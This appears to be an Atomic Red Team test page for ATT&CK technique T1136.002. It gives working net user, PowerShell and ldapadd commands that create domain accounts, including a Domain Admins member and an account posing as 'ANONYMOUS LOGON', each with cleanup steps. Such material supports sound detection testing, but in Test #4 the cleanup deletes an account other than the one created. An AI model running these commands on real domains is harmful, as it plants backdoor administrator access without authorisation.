T1136.002
Create Account: Domain Account
Description from ATT&CK
Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the net user /add /domain command can be used to create a domain account.
Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Atomic Tests
Atomic Test #1 - Create a new Windows domain admin user
Creates a new domain admin user in a command prompt.
Supported Platforms: windows
auto_generated_guid: fcec2963-9951-4173-9bfa-98d8b7834e62
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Username of the user to create | string | T1136.002_Admin |
| password | Password of the user to create | string | T1136_pass123! |
| group | Domain administrator group to which add the user to | string | Domain Admins |
Attack Commands: Run with command_prompt!
1
2
3
net user "#{username}" "#{password}" /add /domain
net group "#{group}" "#{username}" /add /domain
Cleanup Commands:
1
2
net user "#{username}" >nul 2>&1 /del /domain
Atomic Test #2 - Create a new account similar to ANONYMOUS LOGON
Create a new account similar to ANONYMOUS LOGON in a command prompt.
Supported Platforms: windows
auto_generated_guid: dc7726d2-8ccb-4cc6-af22-0d5afb53a548
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Username of the user to create | string | ANONYMOUS LOGON |
| password | Password of the user to create | string | T1136_pass123! |
Attack Commands: Run with command_prompt!
1
2
net user "#{username}" "#{password}" /add /domain
Cleanup Commands:
1
2
net user "#{username}" >nul 2>&1 /del /domain
Atomic Test #3 - Create a new Domain Account using PowerShell
Creates a new Domain User using the credentials of the Current User
Supported Platforms: windows
auto_generated_guid: 5a3497a4-1568-4663-b12a-d4a5ed70c7d7
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Name of the Account to be created | string | T1136.002_Admin |
| password | Password of the Account to be created | string | T1136_pass123! |
Attack Commands: Run with powershell!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
$SamAccountName = '#{username}'
$AccountPassword = ConvertTo-SecureString '#{password}' -AsPlainText -Force
Add-Type -AssemblyName System.DirectoryServices.AccountManagement
$Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain)
$User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList ($Context)
$User.SamAccountName = $SamAccountName
$TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword)
$User.SetPassword($TempCred.GetNetworkCredential().Password)
$User.Enabled = $True
$User.PasswordNotRequired = $False
$User.DisplayName = $SamAccountName
$User.Save()
$User
Cleanup Commands:
1
2
cmd /c "net user #{username} /del >nul 2>&1"
Atomic Test #4 - Active Directory Create Admin Account
Use Admin Credentials to Create A Domain Admin Account
Supported Platforms: linux
auto_generated_guid: 562aa072-524e-459a-ba2b-91f1afccf5ab
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| domain | The domain to be tested | string | example |
| top_level_domain | The top level domain (.com, .test, .remote, etc… following domain, minus the .) | string | test |
| admin_user | username@domain of a user with admin privileges | string | admin@example.test |
| admin_password | password of the user with admin privileges referenced in admin_user | string | s3CurePssw0rD! |
| domain_controller | Name of the domain_controller machine, defined in etc/hosts | string | adVM |
Attack Commands: Run with sh!
1
2
3
4
echo "dn: CN=Admin User,CN=Users,DC=#{domain},DC=#{top_level_domain}\nchangetype: add\nobjectClass: top\nobjectClass: person\nobjectClass: organizationalPerson\nobjectClass: user\ncn: Admin User\nsn: User\ngivenName: Atomic User\nuserPrincipalName: adminuser@#{domain}.#{top_level_domain}\nsAMAccountName: adminuser\nuserAccountControl: 512\nuserPassword: {CLEARTEXT}s3CureP4ssword123!\nmemberOf: CN=Domain Admins,CN=Users,DC=#{domain},DC=#{top_level_domain}" > tempadmin.ldif
echo ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
Cleanup Commands:
1
2
3
4
5
6
echo removing Atomic User (temporary user)
echo "dn: cn=Atomic User,cn=Users,dc=scwxscratch,dc=dev\nchangetype: delete" > deleteuser.ldif
ldapmodify -H ldap://#{domain_controller}:389 -x -D #{admin_user} -w #{admin_password} -f deleteuser.ldif
rm deleteuser.ldif
rm tempadmin.ldif
Dependencies: Run with sh!
Description: Packages sssd-ad sssd-tools realmd adcli installed and realm available
Check Prereq Commands:
1
2
which ldapadd && which ldapmodify
Get Prereq Commands:
1
2
echo ldapadd or ldapmodify not found; exit 1
Atomic Test #5 - Active Directory Create User Account (Non-elevated)
Use Admin Credentials to Create A Normal Account (as means of entry)
Supported Platforms: linux
auto_generated_guid: 8c992cb3-a46e-4fd5-b005-b1bab185af31
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| domain | The domain to be tested | string | example |
| top_level_domain | The top level domain (.com, .test, .remote, etc… following domain, minus the .) | string | test |
| admin_user | username@domain of a user with admin privileges | string | user@example.test |
| admin_password | password of the user | string | s3CurePssw0rD! |
| domain_controller | Name of the domain_controller machine, defined in etc/hosts | string | adVM |
Attack Commands: Run with sh!
1
2
3
4
echo "dn: cn=Atomic User, cn=Users,dc=#{domain},dc=#{top_level_domain}\nobjectClass: person\ncn: Atomic User\nsn: User" > tempadmin.ldif
echo ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
Cleanup Commands:
1
2
3
4
5
6
echo removing Atomic User (temporary user)
echo "dn: cn=Atomic User,cn=Users,dc=scwxscratch,dc=dev\nchangetype: delete" > deleteuser.ldif
ldapmodify -H ldap://#{domain_controller}:389 -x -D #{admin_user} -w #{admin_password} -f deleteuser.ldif
rm deleteuser.ldif
rm tempadmin.ldif
Dependencies: Run with sh!
Description: Packages sssd-ad sssd-tools realmd adcli installed and realm available, ldapadd, ldapmodify
Check Prereq Commands:
1
2
3
which ldapadd
which ldapmodify
Get Prereq Commands:
1
2
echo ldapadd or ldapmodify not found; exit 1